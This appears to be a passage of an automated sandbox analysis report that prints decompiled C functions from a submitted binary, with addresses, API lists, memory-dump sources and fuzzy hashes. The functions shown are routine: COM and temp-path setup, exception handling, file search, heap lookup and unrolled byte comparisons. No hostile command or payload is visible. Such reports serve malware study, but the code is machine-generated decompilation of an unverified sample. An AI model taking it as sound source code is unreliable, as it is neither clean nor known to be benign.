						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                            0x0040205c
                                            0x00402066
                                            0x0040206f
                                            0x00402079
                                            0x00402082
                                            0x0040208c
                                            0x00402090
                                            0x00402090
                                            0x00402095
                                            0x004020a6
                                            0x004020ae
                                            0x0040218e
                                            0x0040218e
                                            0x00402195
                                            0x004020b4
                                            0x004020b4
                                            0x004020c5
                                            0x004020c9
                                            0x004020cf
                                            0x004020d9
                                            0x004020db
                                            0x004020e6
                                            0x004020e9
                                            0x004020f6
                                            0x004020f8
                                            0x004020fa
                                            0x00402101
                                            0x00402104
                                            0x00402104
                                            0x00402107
                                            0x00402111
                                            0x00402119
                                            0x0040211e
                                            0x0040212a
                                            0x0040212a
                                            0x0040212d
                                            0x00402136
                                            0x00402139
                                            0x00402142
                                            0x00402147
                                            0x00402159
                                            0x00402168
                                            0x0040216a
                                            0x00402176
                                            0x00402176
                                            0x00402168
                                            0x00402178
                                            0x0040217e
                                            0x0040217e
                                            0x00402181
                                            0x00402187
                                            0x0040218c
                                            0x004021a1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040218c
                                            0x00402197
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 123533781-1943935188
                                            • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                            • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                            • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                            • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10009B50, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E10009B50(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                            0x10009b55
                                            0x10009b65

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,10008390,?,?,?,00000001), ref: 10009B55
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 10009B5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: b656da03d4f53ad6eb9e188b92757f7d37e7a5c5ce8d4448850ca58cee667456
                                            • Instruction ID: 68490d5fedbad4c1c24718ac7e6d684dd58fdb0e9d5ec0c0e3ec346b29ed2d69
                                            • Opcode Fuzzy Hash: b656da03d4f53ad6eb9e188b92757f7d37e7a5c5ce8d4448850ca58cee667456
                                            • Instruction Fuzzy Hash: A9B09231149218BBEB002BE1DC4DB687F29EB08666F088010F60D44061CB72D7108B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 39%
                                            			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                            0x00402689
                                            0x0040269d
                                            0x004026a8
                                            0x004026a9
                                            0x004027e4
                                            0x0040268b
                                            0x0040268b
                                            0x0040268d
                                            0x0040268f
                                            0x0040268f
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                            • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                            • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                            • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 100098B2, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E100098B2() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x1001daa0 = _t3;
				return 0 | _t3 != 0x00000000;
			}




                                            0x100098b2
                                            0x100098ba
                                            0x100098c6

                                            APIs
                                            • GetProcessHeap.KERNEL32(10012841,10019380,00000008,10012A19,?,00000001,?,100193A0,0000000C,10012AE9,?,00000001,?), ref: 100098B2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: a2a19a651c28b9c837c2ad151e4f28f2e31f3a869b93d4498b43ecfd596766f4
                                            • Instruction ID: 41b7f87da54ba6a4b98f41e9d280661a3a923aeea5c2e120528fd8250ba703f3
                                            • Opcode Fuzzy Hash: a2a19a651c28b9c837c2ad151e4f28f2e31f3a869b93d4498b43ecfd596766f4
                                            • Instruction Fuzzy Hash: 2CB092B02051224BAB086B3C5C9410A25D46B08201384812AB003C65A0DF30C510DA04
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 100066E2, Relevance: .3, Instructions: 345COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E100066E2(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                            0x100066e2
                                            0x100066e2
                                            0x100066e8
                                            0x1000676f
                                            0x10006771
                                            0x10006773
                                            0x00000000
                                            0x00000000
                                            0x10006779
                                            0x1000677f
                                            0x10006806
                                            0x10006808
                                            0x1000680a
                                            0x00000000
                                            0x00000000
                                            0x10006810
                                            0x10006816
                                            0x1000689d
                                            0x1000689f
                                            0x100068a1
                                            0x00000000
                                            0x00000000
                                            0x100068a7
                                            0x100068ad
                                            0x10006934
                                            0x10006936
                                            0x10006938
                                            0x00000000
                                            0x00000000
                                            0x1000693e
                                            0x10006944
                                            0x100069cb
                                            0x100069cd
                                            0x100069cf
                                            0x00000000
                                            0x00000000
                                            0x100069db
                                            0x10006a63
                                            0x10006a65
                                            0x10006a67
                                            0x00000000
                                            0x00000000
                                            0x10006a6d
                                            0x10006a73
                                            0x10006afa
                                            0x10006afc
                                            0x10006afe
                                            0x10006afe
                                            0x00000000
                                            0x10006afe
                                            0x10006a80
                                            0x10006a82
                                            0x10006a9a
                                            0x10006aa2
                                            0x10006aa4
                                            0x10006abc
                                            0x10006ac4
                                            0x10006ac6
                                            0x10006ade
                                            0x10006ae6
                                            0x10006ae8
                                            0x10006af1
                                            0x10006af1
                                            0x00000000
                                            0x10006ae8
                                            0x10006acf
                                            0x10006ad8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006ad8
                                            0x10006aad
                                            0x10006ab6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006ab6
                                            0x10006a8b
                                            0x10006a94
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006a94
                                            0x100069e9
                                            0x100069eb
                                            0x10006a03
                                            0x10006a0b
                                            0x10006a0d
                                            0x10006a25
                                            0x10006a2d
                                            0x10006a2f
                                            0x10006a47
                                            0x10006a4f
                                            0x10006a51
                                            0x10006a5a
                                            0x10006a5a
                                            0x00000000
                                            0x10006a51
                                            0x10006a38
                                            0x10006a41
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006a41
                                            0x10006a16
                                            0x10006a1f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006a1f
                                            0x100069f4
                                            0x100069fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100069fd
                                            0x10006951
                                            0x10006953
                                            0x1000696b
                                            0x10006973
                                            0x10006975
                                            0x1000698d
                                            0x10006995
                                            0x10006997
                                            0x100069af
                                            0x100069b7
                                            0x100069b9
                                            0x100069c2
                                            0x100069c2
                                            0x00000000
                                            0x100069b9
                                            0x100069a0
                                            0x100069a9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100069a9
                                            0x1000697e
                                            0x10006987
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006987
                                            0x1000695c
                                            0x10006965
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006965
                                            0x100068ba
                                            0x100068bc
                                            0x100068d4
                                            0x100068dc
                                            0x100068de
                                            0x100068f6
                                            0x100068fe
                                            0x10006900
                                            0x10006918
                                            0x10006920
                                            0x10006922
                                            0x1000692b
                                            0x1000692b
                                            0x00000000
                                            0x10006922
                                            0x10006909
                                            0x10006912
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006912
                                            0x100068e7
                                            0x100068f0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100068f0
                                            0x100068c5
                                            0x100068ce
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100068ce
                                            0x10006823
                                            0x10006825
                                            0x1000683d
                                            0x10006845
                                            0x10006847
                                            0x1000685f
                                            0x10006867
                                            0x10006869
                                            0x10006881
                                            0x10006889
                                            0x1000688b
                                            0x10006894
                                            0x10006894
                                            0x00000000
                                            0x1000688b
                                            0x10006872
                                            0x1000687b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000687b
                                            0x10006850
                                            0x10006859
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006859
                                            0x1000682e
                                            0x10006837
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006837
                                            0x1000678c
                                            0x1000678e
                                            0x100067a6
                                            0x100067ae
                                            0x100067b0
                                            0x100067c8
                                            0x100067d0
                                            0x100067d2
                                            0x100067ea
                                            0x100067f2
                                            0x100067f4
                                            0x100067fd
                                            0x100067fd
                                            0x00000000
                                            0x100067f4
                                            0x100067db
                                            0x100067e4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100067e4
                                            0x100067b9
                                            0x100067c2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100067c2
                                            0x10006797
                                            0x100067a0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100066ee
                                            0x100066ee
                                            0x100066f5
                                            0x100066f7
                                            0x1000670f
                                            0x1000670f
                                            0x10006717
                                            0x10006719
                                            0x10006731
                                            0x10006731
                                            0x10006739
                                            0x1000673b
                                            0x10006753
                                            0x10006753
                                            0x1000675b
                                            0x1000675d
                                            0x10006766
                                            0x10006766
                                            0x00000000
                                            0x1000675d
                                            0x10006741
                                            0x10006744
                                            0x1000674d
                                            0x100062a5
                                            0x100062a5
                                            0x10007096
                                            0x10007096
                                            0x00000000
                                            0x1000674d
                                            0x1000671f
                                            0x10006722
                                            0x1000672b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000672b
                                            0x100066fd
                                            0x10006700
                                            0x10006709
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006709

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction ID: 2adbf60f93d3b186d9e610549e29d149ee88be202c4dc482f1b21a02b0eefda9
                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction Fuzzy Hash: 90C164722095930AFF5DC679883413FBAE29F966F1327476DD4B2DB1D8EE20C524D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10006B17, Relevance: .3, Instructions: 341COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E10006B17(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
